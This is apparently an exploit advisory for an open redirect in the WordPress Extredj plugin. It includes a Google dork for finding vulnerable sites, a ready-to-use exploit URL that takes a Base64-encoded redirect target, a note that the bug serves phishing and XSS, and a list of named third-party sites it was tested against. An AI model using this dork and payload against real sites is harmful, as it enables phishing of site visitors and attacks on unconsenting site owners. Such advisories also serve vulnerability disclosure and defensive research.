_ __ ___ (_) |_ __/ _ \ / _ \ _ __ _ __ ___ | '_ ` _ \| | \ \ /\ / / | | | | | | '__| '_ ` _ \ | | | | | | | |\ V V /| |_| | |_| | | | | | | | | |_| |_| |_|_|_| \_/\_/ \___/ \___/|_| |_| |_| |_| Wordpress (Extredj Plugin) - Open Redirect Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] Skype : knockoutr@msn.com [~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com [~] Greetz : b3mb4m, ZoRLu, Sen Haxor, Ne0-h4ck3r, KedAns-Dz ( milw00rm.com ) =================================================================== ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Wordpress |~Plugin : Extredj |~Affected Version : ALL |~Software : https://pluginu.com/extredj/ |~RISK : Medium |~Google Dork : inurl:/wp-content/plugins/extredj =================================================================== ======================Info========================================= danger, remained on the offensive creativity, It can be worked out for phishing and XSS attacks. =====================Exploitation================================================= http://[TARGET]/wp-content/plugins/extredj/red.php?ext= Base64 encoded URL. Example : http://[TARGET]/wp-content/plugins/extredj/red.php?ext=aHR0cDovL21pbHcwMHJtLmNvbQ== =====================Tested on==================================================== http://trendsblog.ru http://gamingblog.ru http://polblog.ru http://murketolog.ru http://marketblog.ru http://bikingblog.ru/ ===================================================================================